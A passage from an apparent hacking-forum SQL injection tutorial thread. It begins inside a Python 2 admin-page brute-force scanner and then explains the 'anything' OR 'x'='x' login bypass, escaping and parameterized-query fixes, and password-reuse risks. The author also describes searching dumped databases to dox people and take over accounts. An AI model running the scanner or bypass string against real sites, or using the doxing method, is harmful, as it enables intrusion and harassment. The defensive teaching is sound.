       print var1, " Admin pages found"
       print var2, " total pages scanned"
       raw_input("The Game Over; Press Enter to Exit")

   if code==4:
       print("\t [+] Scanning " + site + "...\n\n")
       for admin in js:
           admin = admin.replace("\n","")
           admin = "/" + admin
           host = site + admin
           print ("\t [#] Checking " + host + "...")
           connection = httplib.HTTPConnection(site)
           connection.request("GET",admin)
           response = connection.getresponse()
           var2 = var2 + 1
           if response.status == 200:
               var1 = var1 + 1
               print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
               raw_input("Press enter to continue scanning.\n")
           elif response.status == 404:
               var2 = var2
           elif response.status == 302:
               print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
           else:
               print "%s %s %s" % (host, " Interesting response:", response.status)
           connection.close()
       print("\n\nCompleted \n")
       print var1, " Admin pages found"
       print var2, " total pages scanned"
       raw_input("The Game Over; Press Enter to Exit")

   if code==5:
       print("\t [+] Scanning " + site + "...\n\n")
       for admin in cgi:
           admin = admin.replace("\n","")
           admin = "/" + admin
           host = site + admin
           print ("\t [#] Checking " + host + "...")
           connection = httplib.HTTPConnection(site)
           connection.request("GET",admin)
           response = connection.getresponse()
           var2 = var2 + 1
           if response.status == 200:
               var1 = var1 + 1
               print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
               raw_input("Press enter to continue scanning.\n")
           elif response.status == 404:
               var2 = var2
           elif response.status == 302:
               print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
           else:
               print "%s %s %s" % (host, " Interesting response:", response.status)
           connection.close()
       print("\n\nCompleted \n")
       print var1, " Admin pages found"
       print var2, " total pages scanned"
       raw_input("The Game Over; Press Enter to Exit")

   if code==6:
       print("\t [+] Scanning " + site + "...\n\n")
       for admin in brf:
           admin = admin.replace("\n","")
           admin = "/" + admin
           host = site + admin
           print ("\t [#] Checking " + host + "...")
           connection = httplib.HTTPConnection(site)
           connection.request("GET",admin)
           response = connection.getresponse()
           var2 = var2 + 1
           if response.status == 200:
               var1 = var1 + 1
               print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
               raw_input("Press enter to continue scanning.\n")
           elif response.status == 404:
               var2 = var2
           elif response.status == 302:
               print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
           else:
               print "%s %s %s" % (host, " Interesting response:", response.status)
           connection.close()
       print("\n\nCompleted \n")
       print var1, " Admin pages found"
       print var2, " total pages scanned"
       raw_input("The Game Over; Press Enter to Exit")
except (httplib.HTTPResponse, socket.error):
   print "\n\t[!] Session Cancelled; Error occurred. Check internet settings"
except (KeyboardInterrupt, SystemExit):
   print "\n\t[!] Session cancelled"



How to fix SQL Injection & security tips
What we've learnt so far is that SQL injection occurs when user input is not sanitized and is then run as part of an SQL query.

Let's imagine some code looking like this.
Code:
SELECT id
FROM logins
WHERE username = '$username'
AND password = '$password'
If I enter, say, "Josh" as the username and "Josh123" as the password, the query ends up looking like this:
Code:
SELECT id
FROM logins
WHERE username = 'Josh'
AND password = 'Josh123'
Right, that's fine, but if I write "anything' OR 'x'='x" as both the username and the password, it ends up looking like this:

Code:
SELECT id
FROM logins
WHERE username = 'anything' OR 'x'='x'
AND password = 'anything' OR 'x'='x'
The comparison 'x'='x' is always true, and since AND binds tighter than OR, the trailing OR 'x'='x' makes the whole WHERE clause true no matter what was written before it.
The query therefore returns a row, and the login page is bypassed.

You should have a good sense of how this works now. What we want is to sanitize the user input so that the PHP script does not pass it through literally and let it be run as SQL code.

This is part of a safe PHP script. It uses the function "mysql_real_escape_string", which escapes the characters that have special meaning inside an SQL string literal (quotes, backslashes, NUL, newlines) so that the input is treated as data rather than as part of the query.
Code:
<?php
// $user and $password are taken from the submitted login form.
// mysql_real_escape_string needs an open mysql_connect() link, because
// it escapes according to the connection's character set.
$query = sprintf("SELECT * FROM users WHERE user='%s' AND password='%s'",
           mysql_real_escape_string($user),
           mysql_real_escape_string($password));
?>
Each of the two variables is passed through mysql_real_escape_string before being placed inside the quoted string literals of the query, so a quote typed by the user can no longer close the literal.
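To make the login bypass above and the escaping fix concrete, here is an added example that is not part of the original post. It uses Python's built-in sqlite3 module so it runs offline against a constructed `logins` table with two rows. SQLite has no mysql_real_escape_string, so the hypothetical `escape_sqlite` helper stands in for it by doubling single quotes, which is the SQLite rule for a quote inside a string literal (the MySQL function does the same job with backslash escaping and is aware of the connection's character set). The third variant uses a parameterized query, which is what current PHP does through PDO or mysqli prepared statements, since the mysql_* extension the snippet relies on was removed in PHP 7.

```python
import sqlite3

# Constructed sample data (not from the original post). Passwords are kept in
# plaintext here only so the query logic is easy to follow; real systems store hashes.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE logins (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO logins (username, password) VALUES (?, ?)",
                     [("Josh", "Josh123"), ("alice", "s3cret")])
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """Builds the query by string interpolation, exactly like the post's
    '$username' / '$password' snippet. Returns the matched id or None."""
    sql = ("SELECT id FROM logins WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def escape_sqlite(s):
    """SQLite analogue of mysql_real_escape_string: a quote inside a quoted
    literal is written as two quotes. Only meaningful inside '...' contexts."""
    return s.replace("'", "''")

def login_escaped(conn, username, password):
    """Same interpolated query, but each value is escaped first, so the
    user-supplied quote can no longer close the string literal."""
    sql = ("SELECT id FROM logins WHERE username = '%s' AND password = '%s'"
           % (escape_sqlite(username), escape_sqlite(password)))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_parameterized(conn, username, password):
    """Prepared statement: the driver sends the values separately from the SQL
    text, so no input can change the structure of the query."""
    row = conn.execute("SELECT id FROM logins WHERE username = ? AND password = ?",
                       (username, password)).fetchone()
    return row[0] if row else None

def demo():
    """Runs all three variants with a valid login and with the post's bypass string."""
    conn = make_db()
    bypass = "anything' OR 'x'='x"
    return {
        "valid_vulnerable": login_vulnerable(conn, "Josh", "Josh123"),
        "bypass_vulnerable": login_vulnerable(conn, bypass, bypass),
        "bypass_escaped": login_escaped(conn, bypass, bypass),
        "bypass_parameterized": login_parameterized(conn, bypass, bypass),
        "valid_parameterized": login_parameterized(conn, "Josh", "Josh123"),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print("%-22s -> %r" % (name, result))
```

Running it shows the vulnerable variant returning Josh's id for the bypass string, while the escaped and parameterized variants return nothing for it and still accept the real credentials. One caveat the post's first example (where id=$id) illustrates: escaping only helps when the value sits inside quotes, so an unquoted numeric parameter stays injectable even after escaping, whereas a bound parameter is safe in either position.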

Once your vulnerabilities are fixed, there are still a few things you can do to help yourself.
If you have missed even one SQL injection vulnerability on your website, you're in big trouble.
As a whitehat you only have to fail once for an attacker to get your database, while the blackhat has all the time in the world to wait for you to make a mistake.

What I like to do is rename admin panels to something that admin finders won't pick up. I also like to play around with my table names; renaming the "admin" table to something unrelated would be a good idea.

SQLi defenses as a user
Since websites are becoming more and more interactive, the number of websites backed by SQL databases is increasing, and that means SQL injections are too.
I've seen a lot of big websites have their databases dumped and posted on the internet, and some dumped databases are even kept private.

When a database is dumped, any passwords stored in plaintext are exposed, and since a lot of users re-use their passwords, they can be found by doxers easily.
Let's say someone dumped the database of a famous booter. If you signed up there, your registration IP, your last-used IP, usernames, passwords, emails and a lot of other scary stuff will be stored in it.
If they're dumped, you can search for a username in the databases and hopefully find their old passwords, re-use them on any other website and access their accounts.

In fact, some years ago I made a little project with some of my friends. We compiled a lot of databases of famous websites and made a simple PHP script to quickly search through all of them looking for similar IPs or usernames, and most of the time we'd find a password or two that we could use in a dox or even re-use on other accounts.
I've been hacked twice over the years of my hacking, and both times it was the simple mistake of re-using passwords, which is pretty funny.

Basically, what I'm telling you is not to re-use passwords on any accounts, and to consider signing up with different aliases or emails, or using a VPN.

Last words
This goes with any tutorial, feel free to ask any questions or just give your opinion on this tutorial.
Thanks for reading.


RE: Taku's SQLi handbook #2
Thank you very much for this very fucking good ebook.
